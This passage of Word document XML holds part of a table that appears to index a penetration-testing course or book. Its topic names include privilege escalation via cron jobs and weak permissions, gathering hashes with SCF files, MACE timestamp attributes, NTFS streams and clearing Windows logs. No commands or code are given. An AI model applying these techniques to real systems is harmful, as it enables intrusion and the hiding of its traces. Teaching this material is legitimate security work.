            <w:r w:rsidR="0093285A" w:rsidRPr="0093285A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/bin/systemctl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="780BC2B3" w14:textId="77777777" w:rsidTr="00EB0837">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="276A7022" w14:textId="02674092" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="395C8040" w14:textId="26FBAC3D" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>91</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CB0DE0F" w14:textId="526D8CF4" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="1843B1E1" w14:textId="20830ADD" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="001B1E76">
              <w:t xml:space="preserve">hanging the </w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="001B1E76">
              <w:t>cat’ command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="5F762297" w14:textId="77777777" w:rsidTr="00F86ADC">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E2AC25B" w14:textId="70D338A0" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="596F0462" w14:textId="4365CBBE" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>92</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="13080FF3" w14:textId="3DC79C88" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="3758A9C8" w14:textId="365AFC9A" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0837">
              <w:t>ount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F86ADC" w14:paraId="2A68BF6F" w14:textId="77777777" w:rsidTr="002D3BAE">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="048E7336" w14:textId="76689B24" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="00F86ADC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="67E6A160" w14:textId="76E82622" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="00F86ADC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>93</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="15C9DA03" w14:textId="3F6E4DE4" w:rsidR="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="00F86ADC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="7BBD5B69" w14:textId="5C26DF9E" w:rsidR="00F86ADC" w:rsidRPr="00F86ADC" w:rsidRDefault="00F86ADC" w:rsidP="00F86ADC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F86ADC">
              <w:t>using scf file to gather hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D3BAE" w14:paraId="2654BA12" w14:textId="77777777" w:rsidTr="00C84DDE">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="53D9B66E" w14:textId="136C456A" w:rsidR="002D3BAE" w:rsidRDefault="002D3BAE" w:rsidP="002D3BAE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="62387AFE" w14:textId="609F7570" w:rsidR="002D3BAE" w:rsidRDefault="002D3BAE" w:rsidP="002D3BAE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>94</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="2BD344BB" w14:textId="6E5DE44C" w:rsidR="002D3BAE" w:rsidRDefault="002D3BAE" w:rsidP="002D3BAE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="63008755" w14:textId="63ED86B4" w:rsidR="002D3BAE" w:rsidRPr="00F86ADC" w:rsidRDefault="002D3BAE" w:rsidP="002D3BAE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>weak file permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="01DA9A9F" w14:textId="77777777" w:rsidTr="00EB0837">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="79EFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AA6719D" w14:textId="4AD39DE9" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>71-129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="0E6194EA" w14:textId="209D57A4" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="509A98AB" w14:textId="0ED426C2" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Specific Exploits and Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9FAFF"/>
          </w:tcPr>
          <w:p w14:paraId="55DFB2C9" w14:textId="0C746463" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>cron jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="297E4C71" w14:textId="77777777" w:rsidTr="00FC0AAD">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF97D0"/>
          </w:tcPr>
          <w:p w14:paraId="69A7E54F" w14:textId="384F1082" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>131-159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="6914EAD4" w14:textId="46952D4E" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="6281ACC4" w14:textId="2760BFAB" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Hlk81917608"/>
            <w:r>
              <w:t>Maintaining Access and Covering Tracks</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="23CDCEAB" w14:textId="6605EED3" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>mace attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="09100AA9" w14:textId="77777777" w:rsidTr="00FC0AAD">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FF97D0"/>
          </w:tcPr>
          <w:p w14:paraId="467EA381" w14:textId="37190CFE" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>131-159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="0353640F" w14:textId="55392F15" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>132</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="31323EE9" w14:textId="70FB4E68" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Maintaining Access and Covering Tracks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="6FA4319B" w14:textId="26A786B7" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FC0AAD">
              <w:t xml:space="preserve">NTFS </w:t>
            </w:r>
            <w:r>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:t xml:space="preserve">treams | </w:t>
            </w:r>
            <w:r>
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:t xml:space="preserve">hite </w:t>
            </w:r>
            <w:r>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:t xml:space="preserve">pace </w:t>
            </w:r>
            <w:r>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:t>teganography</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="300D460E" w14:textId="77777777" w:rsidTr="00736CE4">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FF97D0"/>
          </w:tcPr>
          <w:p w14:paraId="1F816306" w14:textId="591520E6" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>131-159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="41C0AAF5" w14:textId="610AF54C" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>133</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="176B4150" w14:textId="5EF741B7" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Maintaining Access and Covering Tracks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="08B55868" w14:textId="1E749AAB" w:rsidR="00C84DDE" w:rsidRPr="00FC0AAD" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>clearing system logs (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="34DE6ACE" w14:textId="77777777" w:rsidTr="00FC0AAD">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF97D0"/>
          </w:tcPr>
          <w:p w14:paraId="10A4EC2C" w14:textId="2DFB7691" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>131-159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="2204FF4C" w14:textId="324DEF33" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>134</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
          <w:p w14:paraId="34C2B9A3" w14:textId="04077D2D" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Maintaining Access and Covering Tracks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD9EE"/>
          </w:tcPr>
